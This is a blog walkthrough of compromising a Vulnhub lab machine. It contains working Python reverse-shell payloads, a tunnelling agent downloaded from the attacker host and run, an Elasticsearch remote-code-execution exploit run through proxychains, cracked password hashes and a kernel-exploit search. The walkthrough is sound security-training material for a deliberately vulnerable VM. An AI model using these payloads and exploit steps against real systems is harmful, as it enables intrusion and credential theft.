title: Vulnhub Target Practice, Week 1
description: Vulnhub target practice, week 1. Difficulty: medium
date: 2023-06-01
categories:
After clearing all the easy HTB boxes, I am moving on to Vulnhub machines to push myself a bit further. Many thanks to @xiaoqiu for the generous help.
Download: https://www.vulnhub.com/entry/boredhackerblog-social-network,454/
```
┌──(kali㉿kali)-[~/Tools/fscan]
└─$ ./fscan -h 192.168.64.1/24
fscan version: 1.8.2
start infoscan
trying RunIcmp2
The current user permissions unable to send icmp packets
start ping
(icmp) Target 192.168.64.2 is alive
(icmp) Target 192.168.64.1 is alive
(icmp) Target 192.168.64.128 is alive
(icmp) Target 192.168.64.132 is alive
```

```
┌──(kali㉿kali)-[~/Tools/fscan]
└─$ sudo arp-scan -l -I eth0
Interface: eth0, type: EN10MB, MAC: 00:0c:29:bb:17:07, IPv4: 192.168.64.128
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.64.1 00:50:56:c0:00:08 VMware, Inc.
192.168.64.2 00:50:56:e3:65:6e VMware, Inc.
192.168.64.132 00:0c:29:3f:6b:8f VMware, Inc.
192.168.64.254 00:50:56:ed:bf:51 VMware, Inc.
4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.980 seconds (129.29 hosts/sec). 4 responded
```

```
┌──(kali㉿kali)-[~/Tools/fscan]
└─$ sudo nmap 192.168.64.1/24
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-01 13:31 CST
Nmap scan report for 192.168.64.1
Host is up (0.00057s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
903/tcp open iss-console-mgr
1086/tcp open cplscrambler-lg
1234/tcp open hotline
3306/tcp open mysql
5357/tcp open wsdapi
8080/tcp open http-proxy
8081/tcp open blackice-icecap
9000/tcp open cslistener
9200/tcp open wap-wsp
10002/tcp open documentum
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.64.2
Host is up (0.00018s latency).
Not shown: 999 closed tcp ports (reset)
PORT STATE SERVICE
53/tcp open domain
MAC Address: 00:50:56:E3:65:6E (VMware)
Nmap scan report for 192.168.64.132
Host is up (0.00045s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
5000/tcp open upnp
MAC Address: 00:0C:29:3F:6B:8F (VMware)
Nmap scan report for 192.168.64.254
Host is up (0.00018s latency).
All 1000 scanned ports on 192.168.64.254 are in ignored states.
Not shown: 1000 filtered tcp ports (no-response)
MAC Address: 00:50:56:ED:BF:51 (VMware)
Nmap scan report for 192.168.64.128
Host is up (0.0000030s latency).
Not shown: 999 closed tcp ports (reset)
PORT STATE SERVICE
80/tcp open http
Nmap done: 256 IP addresses (5 hosts up) scanned in 7.79 seconds
```
The three tools give somewhat different results, but all of them show the target machine at 192.168.64.132. We can use nmap for a closer look at it:
```
┌──(kali㉿kali)-[~/Tools/fscan]
└─$ sudo nmap --min-rate 10000 192.168.64.132
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-01 13:36 CST
Nmap scan report for 192.168.64.132
Host is up (0.00071s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
5000/tcp open upnp
MAC Address: 00:0C:29:3F:6B:8F (VMware)
Nmap done: 1 IP address (1 host up) scanned in 0.28 seconds
```
Only port 5000 is of interest, so let's visit it:

![](https://qing3feng.github.io/Blogimages/vulhub打靶第一周/image-20230601133912-1yivvba.png)

A quick test turns up no common vulnerabilities, so we gather more information about the site. Since the target is a bare IP address, subdomain enumeration does not apply; we brute-force its directories instead. Any of three directory-scanning tools will do:
```bash
python dirsearch.py -u http://192.168.64.132:5000/
ffuf -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt -t 100 -mc 200,301 -u http://192.168.64.132:5000/FUZZ
gobuster dir -u http://192.168.64.132:5000/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
# Prerequisites:
# 1. seclists wordlists --> install with: sudo apt install seclists
#
# 2. dirsearch --> method 1: just type `dirsearch`; Kali offers to install it, and afterwards it works as a command
#                  method 2: git clone https://github.com/maurosoria/dirsearch
```
```
┌──(kali㉿kali)-[~/Tools/fscan]
└─$ sudo ffuf -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt -t 100 -mc 200,301 -u http://192.168.64.132:5000/FUZZ
v2.0.0-dev
________________________________________________
:: Method : GET
:: URL : http://192.168.64.132:5000/FUZZ
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 100
:: Matcher : Response status: 200,301
________________________________________________
:: Progress: [100/26584] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: [Status: 200, Size: 401, Words: 28, Lines: 20, Duration: 94ms]
* FUZZ: admin
```

```
┌──(kali㉿kali)-[~/Tools/fscan]
└─$ gobuster dir -u http://192.168.64.132:5000/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.64.132:5000/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.5
[+] Timeout: 10s
===============================================================
2023/06/01 13:43:27 Starting gobuster in directory enumeration mode
===============================================================
/admin (Status: 200) [Size: 401]
```

```
┌──(kali㉿kali)-[~/Tools/dirsearch]
└─$ sudo python dirsearch.py -u http://192.168.64.132:5000/
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25
Wordlist size: 11710
Output: /home/kali/Tools/dirsearch/reports/http_192.168.64.132_5000/__23-06-01_13-44-06.txt
Target: http://192.168.64.132:5000/
[13:44:06] Starting:
[13:44:40] 200 - 401B - /admin
```
gobuster and dirsearch are the friendlier of the three, so I recommend those two. gobuster also supports subdomain enumeration; see the commands in qing3feng.github.io/2023… for that. We have found /admin, so let's visit it.
![](https://qing3feng.github.io/Blogimages/vulhub打靶第一周/image-20230601135120-nbic7kf.png)
It turns out to be a code-execution endpoint: whatever we submit is passed straight to exec. So we write a reverse shell; either of the two payloads below works:
```python
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.64.128",9001));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")
```

```python
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.64.128",9001));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);
```
```
┌──(kali㉿kali)-[~/Tools/dirsearch]
└─$ nc -lvnp 9001
listening on [any] 9001 ...
connect to [192.168.64.128] from (UNKNOWN) [192.168.64.132] 43205
/app # ls /
ls /
app dev home media proc run srv tmp var
bin etc lib mnt root sbin sys usr
/app # whoami
whoami
root
```
We are root right away, so no privilege escalation is needed. Let's look at the network interfaces:
```
/app # ifconfig
ifconfig
eth0 Link encap:Ethernet HWaddr 02:42:AC:11:00:02
inet addr:172.17.0.2 Bcast:172.17.255.255 Mask:255.255.0.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:217054 errors:0 dropped:0 overruns:0 frame:0
TX packets:215883 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:21519988 (20.5 MiB) TX bytes:30322971 (28.9 MiB)
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
```
Oddly, there is only a 172.17 network here, yet we came in over the 192.168 network and landed on a 172.17 host. That strongly suggests we are inside a Docker container running on 192.168.64.132. We can check the guess with `cat /proc/1/cgroup`:
```
/app # cat /proc/1/cgroup
11:hugetlb:/docker/755411217bdd1508dcdd52fb7ab71f0e5036a326c987e76227fc7e49dca49481
10:perf_event:/docker/755411217bdd1508dcdd52fb7ab71f0e5036a326c987e76227fc7e49dca49481
9:blkio:/docker/755411217bdd1508dcdd52fb7ab71f0e5036a326c987e76227fc7e49dca49481
8:freezer:/docker/755411217bdd1508dcdd52fb7ab71f0e5036a326c987e76227fc7e49dca49481
7:devices:/docker/755411217bdd1508dcdd52fb7ab71f0e5036a326c987e76227fc7e49dca49481
6:memory:/docker/755411217bdd1508dcdd52fb7ab71f0e5036a326c987e76227fc7e49dca49481
5:cpuacct:/docker/755411217bdd1508dcdd52fb7ab71f0e5036a326c987e76227fc7e49dca49481
4:cpu:/docker/755411217bdd1508dcdd52fb7ab71f0e5036a326c987e76227fc7e49dca49481
3:cpuset:/docker/755411217bdd1508dcdd52fb7ab71f0e5036a326c987e76227fc7e49dca49481
2:name=systemd:/docker/755411217bdd1508dcdd52fb7ab71f0e5036a326c987e76227fc7e49dca49481
```
When every entry ends in a long hexadecimal string like this, we can be sure it is Docker. Compare with the local Kali host:
```
┌──(kali㉿kali)-[/var/www/html]
└─$ cat /proc/1/cgroup
0::/init.scope
```
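The same check can be automated. The Python below is an added example (not code from the write-up): it parses the two listings shown above, the container's cgroup v1 lines and Kali's cgroup v2 `0::/init.scope`, and also goes beyond the page by recognising the cgroup v2 path Docker uses with the systemd driver (`/system.slice/docker-<id>.scope`). Sample inputs are constructed from the output above.

```python
"""Tell from /proc/1/cgroup whether we are inside a Docker container.

Added example, not code from the write-up. Handles the cgroup v1 layout seen
in the container above, the plain cgroup v2 layout seen on Kali, and (beyond
the page) the cgroup v2 layout Docker uses with the systemd cgroup driver.
"""
import re
from dataclasses import dataclass
from typing import Optional

# Each line of /proc/PID/cgroup is 'hierarchy-id:controller-list:path'.
_CGROUP_LINE = re.compile(r"^(\d+):([^:]*):(.*)$")
# Docker names the cgroup after the full 64-hex container id, either as
# /docker/<id> (cgroupfs driver) or .../docker-<id>.scope (systemd driver).
_DOCKER_ID = re.compile(r"(?:^/docker/|/docker-)([0-9a-f]{64})(?:\.scope)?$")


@dataclass
class CgroupVerdict:
    in_docker: bool
    container_id: Optional[str]  # full 64-hex id, or None
    cgroup_version: int          # 1 (one line per hierarchy) or 2 (single '0::' line)

    @property
    def short_id(self) -> Optional[str]:
        # Docker uses the first 12 hex digits as the default hostname, which is
        # why `uname -a` in the container above reported '755411217bdd'.
        return self.container_id[:12] if self.container_id else None


def inspect_cgroup(text: str) -> CgroupVerdict:
    """Parse the contents of /proc/1/cgroup and return a verdict."""
    ids = set()
    v1_lines = 0
    for raw in text.splitlines():
        m = _CGROUP_LINE.match(raw.strip())
        if not m:
            continue  # tolerate blank or garbled lines
        hier_id, controllers, path = m.groups()
        if hier_id != "0" or controllers:
            v1_lines += 1  # only cgroup v1 has numbered hierarchies / controller names
        d = _DOCKER_ID.search(path)
        if d:
            ids.add(d.group(1))
    if len(ids) > 1:
        # Hierarchies disagreeing on the id means the file is not trustworthy.
        raise ValueError(f"inconsistent container ids: {sorted(ids)}")
    cid = ids.pop() if ids else None
    return CgroupVerdict(in_docker=cid is not None, container_id=cid,
                         cgroup_version=1 if v1_lines else 2)


def read_live_cgroup(path: str = "/proc/1/cgroup") -> Optional[CgroupVerdict]:
    """Inspect the running system; returns None where the file does not exist."""
    try:
        with open(path, encoding="utf-8") as fh:
            return inspect_cgroup(fh.read())
    except OSError:
        return None


# Constructed samples copied from the two listings above (two of the
# container's eleven hierarchies are enough to exercise the parser).
CONTAINER_SAMPLE = (
    "11:hugetlb:/docker/755411217bdd1508dcdd52fb7ab71f0e5036a326c987e76227fc7e49dca49481\n"
    "2:name=systemd:/docker/755411217bdd1508dcdd52fb7ab71f0e5036a326c987e76227fc7e49dca49481\n"
)
KALI_SAMPLE = "0::/init.scope\n"
# Constructed sample of the systemd-driver layout; the id is made up.
SYSTEMD_SAMPLE = "0::/system.slice/docker-" + "ab" * 32 + ".scope\n"

if __name__ == "__main__":
    for label, sample in (("container", CONTAINER_SAMPLE), ("kali", KALI_SAMPLE),
                          ("systemd", SYSTEMD_SAMPLE)):
        v = inspect_cgroup(sample)
        print(f"{label:9s} docker={v.in_docker!s:5s} cgroup_v{v.cgroup_version} id={v.short_id}")
```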
The next step is escaping from the Docker container. For that we need to scan the internal network, but the container has no scanning tools, so the simplest approach is a small shell loop:
```
/app # for i in $(seq 1 10);do ping -c 1 172.17.0.$i|grep ttl;done
64 bytes from 172.17.0.1: seq=0 ttl=64 time=0.039 ms
64 bytes from 172.17.0.2: seq=0 ttl=64 time=0.021 ms
64 bytes from 172.17.0.3: seq=0 ttl=64 time=0.036 ms
```
Three hosts reply. For deeper probing we would rather use proper, integrated tools, so we set up a tunnel and scan with the tools on the Kali host. How do we build the tunnel? Here we use Venom:
```
┌──(kali㉿kali)-[~/Tools]
└─$ git clone https://github.com/Dliv3/Venom
```
After cloning, enter the directory and build it:
```
┌──(kali㉿kali)-[~/Tools/Venom]
└─$ ./build.sh
build macos x64 admin & agent...
go: downloading github.com/cheggaaa/pb/v3 v3.0.1
go: downloading golang.org/x/crypto v0.0.0-20190911031432-227b76d455e7
go: downloading github.com/libp2p/go-reuseport v0.0.1
go: downloading github.com/fatih/color v1.7.0
go: downloading github.com/VividCortex/ewma v1.1.1
go: downloading github.com/mattn/go-colorable v0.1.2
go: downloading github.com/mattn/go-isatty v0.0.8
go: downloading github.com/mattn/go-runewidth v0.0.4
go: downloading golang.org/x/sys v0.0.0-20190412213103-97732733099d
build linux x64 admin & agent...
build linux x86 admin & agent...
build windows x86 admin & agent...
build arm eabi5 agent...
build mipsel agent..
```
Enter the release directory and start a local HTTP server so the Docker container can download the agent that will connect back to us. First check whether the container is 32- or 64-bit and which kernel it runs:
```
/app # cat /proc/version
Linux version 3.13.0-24-generic (buildd@panlong) (gcc version 4.8.2 (Ubuntu 4.8.2-19ubuntu1) ) #46-Ubuntu SMP Thu Apr 10 19:11:08 UTC 2014
/app # uname -a
Linux 755411217bdd 3.13.0-24-generic #46-Ubuntu SMP Thu Apr 10 19:11:08 UTC 2014 x86_64 Linux
```
It is 64-bit. In the Venom/release directory, start a web server with python:
```
┌──(kali㉿kali)-[~/Tools/Venom/release]
└─$ python -m http.server 8888
Serving HTTP on 0.0.0.0 port 8888 (http://0.0.0.0:8888/) ...
```
Download the agent on the target:
```
/app # wget 192.168.64.128:8888/agent_linux_x64
Connecting to 192.168.64.128:8888 (192.168.64.128:8888)
agent_linux_x64 100% |*******************************| 3564k 0:00:00 ETA
```
Start the listener on Kali:
```
┌──(kali㉿kali)-[~/Tools/Venom/release]
└─$ ./admin_linux_x64 -lport 2333
Venom Admin Node Start...
{ v1.1 author: Dlive }
```
Connect from the target back to Kali:
```
/app # ./agent_linux_x64 -rhost 192.168.64.128 -rport 2333
./agent_linux_x64 -rhost 192.168.64.128 -rport 2333
2023/06/01 06:45:18 [+]Successfully connects to a new node
```
Once connected, `show` lists the connected nodes:

![](https://qing3feng.github.io/Blogimages/vulhub打靶第一周/image-20230601192857-7d55eso.png)
Use `goto 1` to enter that node, then start a SOCKS5 proxy on it:

![](https://qing3feng.github.io/Blogimages/vulhub打靶第一周/image-20230601193058-hd3jrd8.png)
Next, use proxychains on the Kali host to route traffic through this SOCKS proxy:
```
┌──(kali㉿kali)-[~/桌面]
└─$ sudo gedit /etc/proxychains4.conf
```

![](https://qing3feng.github.io/Blogimages/vulhub打靶第一周/image-20230601193233-jy5kae1.png)
With the proxy configured, information gathering can begin. From the earlier enumeration we know the container we have taken over is 172.17.0.2:
```
/app # for i in $(seq 1 10);do ping -c 1 172.17.0.$i|grep ttl;done
64 bytes from 172.17.0.1: seq=0 ttl=64 time=0.039 ms
64 bytes from 172.17.0.2: seq=0 ttl=64 time=0.021 ms
64 bytes from 172.17.0.3: seq=0 ttl=64 time=0.036 ms
```
That leaves 172.17.0.3 and 172.17.0.1:
```
┌──(kali㉿kali)-[~/桌面]
└─$ proxychains nmap -sT -Pn 172.17.0.1
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
5000/tcp open upnp
```

```
┌──(kali㉿kali)-[~/桌面]
└─$ proxychains nmap -sT -Pn 172.17.0.3
Nmap scan report for 172.17.0.3
Host is up (0.025s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT STATE SERVICE
9200/tcp open wap-wsp
Nmap done: 1 IP address (1 host up) scanned in 23.14 seconds
```
Scanning 172.17.0.1 shows the same two ports we saw at the start, so it is probably the gateway. Let's probe 172.17.0.3 in more detail:
```
┌──(kali㉿kali)-[~/桌面]
└─$ proxychains nmap -sT -sV -p 9200 172.17.0.3
PORT STATE SERVICE VERSION
9200/tcp open http Elasticsearch REST API 1.4.2 (name: Brain Cell; cluster: elasticsearch; Lucene 4.10.2)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.92 seconds
```
It is Elasticsearch; let's check whether there is a known (n-day) exploit for it:
```
┌──(kali㉿kali)-[~/桌面]
└─$ searchsploit Elasticsearch
------------------------------------------ ---------------------------------
Exploit Title | Path
------------------------------------------ ---------------------------------
ElasticSearch - Remote Code Execution | linux/remote/36337.py
ElasticSearch - Remote Code Execution | multiple/webapps/33370.html
ElasticSearch - Search Groovy Sandbox Byp | java/remote/36415.rb
ElasticSearch 1.6.0 - Arbitrary File Down | linux/webapps/38383.py
ElasticSearch 7.13.3 - Memory disclosure | multiple/webapps/50149.py
ElasticSearch < 1.4.5 / < 1.5.2 - Directo | php/webapps/37054.py
ElasticSearch Dynamic Script - Arbitrary | java/remote/33588.rb
Elasticsearch ECE 7.13.3 - Anonymous Data | multiple/webapps/50152.py
------------------------------------------ ---------------------------------
Shellcodes: No Results
```
Several of these apply; we try the RCE first:

![](https://qing3feng.github.io/Blogimages/vulhub打靶第一周/image-20230601195524-zfpsxwd.png)

Its help text is shown above; we run:
```
┌──(kali㉿kali)-[~/HTB/week1]
└─$ proxychains python2 36337.py 172.17.0.3
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
Exploit for ElasticSearch , CVE-2015-1427 Version: 20150309.1
{*} Spawning Shell on target... Do note, its only semi-interactive... Use it to drop a better payload or something
~$ ls
[proxychains] Strict chain ... 192.168.64.128:10001 ... 172.17.0.3:9200 ... OK
bin
boot
dev
elasticsearch
elasticsearch-1.4.2.tar.gz
etc
home
lib
lib64
main.sh
media
mnt
opt
passwords
proc
root
run
```
Command execution works (remember to prefix the command with proxychains). There is a file named passwords, so let's look at it:
```
~$ cat passwords
[proxychains] Strict chain ... 192.168.64.128:10001 ... 172.17.0.3:9200 ... OK
Format: number,number,number,number,lowercase,lowercase,lowercase,lowercase
Example: 1234abcd
john:3f8184a7343664553fcb5337a3138814
test:861f194e9d6118f3d942a72be3e51749
admin:670c3bbc209a18dde5446e5e6c1f1d5b
root:b3d34352fc26117979deabdf1b9b6354
jane:5c158b60ed97c723b673529b8a3cf72b
```
These look like MD5 hashes; we look them up with an online tool:

![](https://qing3feng.github.io/Blogimages/vulhub打靶第一周/image-20230601195857-8rzdc79.png)

The first one resolves to 1337hack; the full set comes out as:
```
john:1337hack
test:1234test
admin:1111pass
root:1234pass
jane:1234jane
```
Those are the recovered account/password pairs; in the end only john can actually log in:
```
┌──(kali㉿kali)-[~/HTB/week1]
└─$ ssh john@192.168.64.132
The authenticity of host '192.168.64.132 (192.168.64.132)' can't be established.
ED25519 key fingerprint is SHA256:JZd5+gaOpg7shDrwi9MncScWvVqsSRB4+LpUUrRP3yo.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.64.132' (ED25519) to the list of known hosts.
john@192.168.64.132's password:
Welcome to Ubuntu 14.04 LTS (GNU/Linux 3.13.0-24-generic x86_64)
* Documentation: https://help.ubuntu.com/
System information disabled due to load higher than 1.0
Last login: Thu Jun 1 01:27:18 2023
john@socnet:~$
```
Neither of the two usual privilege-escalation checks gets us anywhere:
```
john@socnet:~$ find / -perm -type f 2 > /dev/null
find: invalid mode `-type'
john@socnet:~$ sudo -l
[sudo] password for john:
Sorry, user john may not run sudo on socnet.
```
So the only option left is a kernel exploit:
```
john@socnet:~$ uname -a
Linux socnet 3.13.0-24-generic #46-Ubuntu SMP Thu Apr 10 19:11:08 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
```
The kernel version is pitifully old: the latest kernel is already at 5.17, two major versions ahead, and in practice that gap is enormous. Search for Linux 3.13 kernel privilege-escalation exploits:
```
┌──(kali㉿kali)-[~]
└─$ searchsploit linux 3.13
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Alienvault Open Source SIEM (OSSIM) < 4.7.0 - 'get_license' Remote Command Execution (Metasploit) | linux/remote/42697.rb
Alienvault Open Source SIEM (OSSIM) < 4.7.0 - av-centerd 'get_log_line()' Remote Code Execution | linux/remote/33805.pl
Alienvault Open Source SIEM (OSSIM) < 4.8.0 - 'get_file' Information Disclosure (Metasploit) | linux/remote/42695.rb
AppArmor securityfs < 4.8 - 'aa_fs_seq_hash_show' Reference Count Leak | linux/dos/40181.c
CyberArk < 10 - Memory Disclosure | linux/remote/44829.py
CyberArk Password Vault < 9.7 / < 10 - Memory Disclosure | linux/dos/44428.txt
Dell EMC RecoverPoint < 5.1.2 - Local Root Command Execution | linux/local/44920.txt
Dell EMC RecoverPoint < 5.1.2 - Local Root Command Execution | linux/local/44920.txt
Dell EMC RecoverPoint < 5.1.2 - Remote Root Command Execution | linux/remote/44921.txt
Dell EMC RecoverPoint < 5.1.2 - Remote Root Command Execution | linux/remote/44921.txt
Dell EMC RecoverPoint boxmgmt CLI < 5.1.2 - Arbitrary File Read | linux/local/44688.txt
DenyAll WAF < 6.3.0 - Remote Code Execution (Metasploit) | linux/webapps/42769.rb
Exim < 4.86.2 - Local Privilege Escalation | linux/local/39549.txt
Exim < 4.90.1 - 'base64d' Remote Code Execution | linux/remote/44571.py
Gnome Web (Epiphany) < 3.28.2.1 - Denial of Service | linux/dos/44857.html
id Software Solaris Quake II 3.13/3.14 / QuakeWorld 2.0/2.1 / Quake 1.9/3.13/3.14 - Command Execution | linux/remote/19079.c
Jfrog Artifactory < 4.16 - Arbitrary File Upload / Remote Command Execution | linux/webapps/44543.txt
KDE libkhtml 3.5 < 4.2.0 - Unhandled HTML Parse Exception | linux/dos/2954.html
LibreOffice < 6.0.1 - '=WEBSERVICE' Remote Arbitrary File Disclosure | linux/remote/44022.md
Linux < 4.14.103 / < 4.19.25 - Out-of-Bounds Read and Write in SNMP NAT Module | linux/dos/46477.txt
Linux < 4.16.9 / < 4.14.41 - 4-byte Infoleak via Uninitialized Struct Field in compat adjtimex Syscall | linux/dos/44641.c
Linux < 4.20.14 - Virtual Address 0 is Mappable via Privileged write() to /proc/*/mem | linux/dos/46502.txt
Linux Kernel (Solaris 10 / < 5.10 138888-01) - Local Privilege Escalation | solaris/local/15962.c
Linux Kernel 2.6.19 < 5.9 - 'Netfilter Local Privilege Escalation | linux/local/50135.c
Linux Kernel 2.6.22 < 3.9 (x86/x64) - 'Dirty COW /proc/self/mem' Race Condition Privilege Escalation (SUID Method) | linux/local/40616.c
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW /proc/self/mem' Race Condition Privilege Escalation (/etc/passwd Method) | linux/local/40847.cpp
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW PTRACE_POKEDATA' Race Condition (Write Access Method) | linux/local/40838.c
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition Privilege Escalation (/etc/passwd Method) | linux/local/40839.c
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' /proc/self/mem Race Condition (Write Access Method) | linux/local/40611.c
Linux Kernel 3.11 < 4.8 0 - 'SO_SNDBUFFORCE' / 'SO_RCVBUFFORCE' Local Privilege Escalation | linux/local/41995.c
Linux Kernel 3.13 - SGID Privilege Escalation | linux/local/33824.c
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privilege Escalation | linux/local/37292.c
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privilege Escalation (Access /etc/shadow) | linux/local/37293.txt
Linux Kernel 3.13.1 - 'Recvmmsg' Local Privilege Escalation (Metasploit) | linux/local/40503.rb
Linux Kernel 3.13/3.14 (Ubuntu) - 'splice()' System Call Local Denial of Service | linux/dos/36743.c
Linux Kernel 3.14-rc1 < 3.15-rc4 (x64) - Raw Mode PTY Echo Race Condition Privilege Escalation | linux_x86-64/local/33516.c
Linux Kernel 3.4 < 3.13.2 (Ubuntu 13.04/13.10 x64) - 'CONFIG_X86_X32=y' Local Privilege Escalation (3) | linux_x86-64/local/31347.c
Linux Kernel 3.4 < 3.13.2 (Ubuntu 13.10) - 'CONFIG_X86_X32' Arbitrary Write (2) | linux/local/31346.c
Linux Kernel 3.4 < 3.13.2 - recvmmsg x32 compat (PoC) | linux/dos/31305.c
Linux Kernel 4.10.5 / < 4.14.3 (Ubuntu) - DCCP Socket Use-After-Free | linux/dos/43234.c
Linux Kernel 4.8.0 UDEV < 232 - Local Privilege Escalation | linux/local/41886.c
Linux Kernel < 3.16.1 - 'Remount FUSE' Local Privilege Escalation | linux/local/34923.c
Linux Kernel < 3.16.39 (Debian 8 x64) - 'inotfiy' Local Privilege Escalation | linux_x86-64/local/44302.c
Linux Kernel < 4.10.13 - 'keyctl_set_reqkey_keyring' Local Denial of Service | linux/dos/42136.c
Linux kernel < 4.10.15 - Race Condition Privilege Escalation | linux/local/43345.c
Linux Kernel < 4.11.8 - 'mq_notify: double sock_put()' Local Privilege Escalation | linux/local/45553.c
Linux Kernel < 4.13.1 - BlueTooth Buffer Overflow (PoC) | linux/dos/42762.txt
Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local Privilege Escalation | linux/local/45010.c
Linux Kernel < 4.14.rc3 - Local Denial of Service | linux/dos/42932.c
Linux Kernel < 4.15.4 - 'show_floppy' KASLR Address Leak | linux/local/44325.c
Linux Kernel < 4.16.11 - 'ext4_read_inline_data()' Memory Corruption | linux/dos/44832.txt
Linux Kernel < 4.17-rc1 - 'AF_LLC' Double Free | linux/dos/44579.c
Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - Local Privilege Escalation | linux/local/44298.c
Linux Kernel < 4.4.0-21 (Ubuntu 16.04 x64) - 'netfilter target_offset' Local Privilege Escalation | linux_x86-64/local/44300.c
Linux Kernel < 4.4.0-83 / < 4.8.0-58 (Ubuntu 14.04/16.04) - Local Privilege Escalation (KASLR / SMEP) | linux/local/43418.c
Linux Kernel < 4.4.0/ < 4.8.0 (Ubuntu 14.04/16.04 / Linux Mint 17/18 / Zorin) - Local Privilege Escalation (KASLR / SMEP) | linux/local/47169.c
Linux Kernel < 4.5.1 - Off-By-One (PoC) | linux/dos/44301.c
Logpoint < 5.6.4 - Root Remote Code Execution | linux/remote/42158.py
MatrixSSL < 4.0.2 - Stack Buffer Overflow Verifying x.509 Certificates | linux/dos/46435.txt
MatrixSSL < 4.0.2 - Stack Buffer Overflow Verifying x.509 Certificates | linux/dos/46435.txt
Nagios < 4.2.2 - Arbitrary Code Execution | linux/remote/40920.py
Nagios < 4.2.4 - Local Privilege Escalation | linux/local/40921.sh
NfSen < 1.3.7 / AlienVault OSSIM < 5.3.6 - Local Privilege Escalation | linux/local/42305.txt
OpenSSH 2.3 < 7.7 - Username Enumeration | linux/remote/45233.py
OpenSSH 2.3 < 7.7 - Username Enumeration (PoC) | linux/remote/45210.py
OpenSSH < 6.6 SFTP (x64) - Command Execution | linux_x86-64/remote/45000.c
OpenSSH < 6.6 SFTP - Command Execution | linux/remote/45001.py
OpenSSH < 7.4 - 'UsePrivilegeSeparation Disabled' Forwarded Unix Domain Sockets Privilege Escalation | linux/local/40962.txt
OpenSSH < 7.4 - agent Protocol Arbitrary Library Loading | linux/remote/40963.txt
OpenSSH < 7.7 - User Enumeration (2) | linux/remote/45939.py
Oracle MySQL < 5.1.49 - 'DDL' Statements Denial of Service | linux/dos/34522.txt
Oracle MySQL < 5.1.49 - Malformed 'BINLOG' Arguments Denial of Service | linux/dos/34521.txt
Oracle VM VirtualBox < 5.0.32 / < 5.1.14 - Local Privilege Escalation | linux/local/41196.txt
Oracle WebCenter FatWire Content Server < 7 - Improper Access Control | linux/webapps/44757.txt
pam-krb5 < 3.13 - Local Privilege Escalation | linux/local/8303.c
PHP < 4.4.5/5.2.1 - 'shmop' Local Code Execution | linux/local/3426.php
PHP < 4.4.5/5.2.1 - 'shmop' SSL RSA Private-Key Disclosure | linux/local/3427.php
PHP < 4.4.5/5.2.1 - '_SESSION unset()' Local Overflow | linux/local/3571.php
PHP < 4.4.5/5.2.1 - '_SESSION' Deserialization Overwrite | linux/local/3572.php
Pi-hole < 4.4 - Authenticated Remote Code Execution | linux/webapps/48442.py
Pi-hole < 4.4 - Authenticated Remote Code Execution / Privileges Escalation | linux/webapps/48443.py
Redis-cli < 5.0 - Buffer Overflow (PoC) | linux/local/44904.py
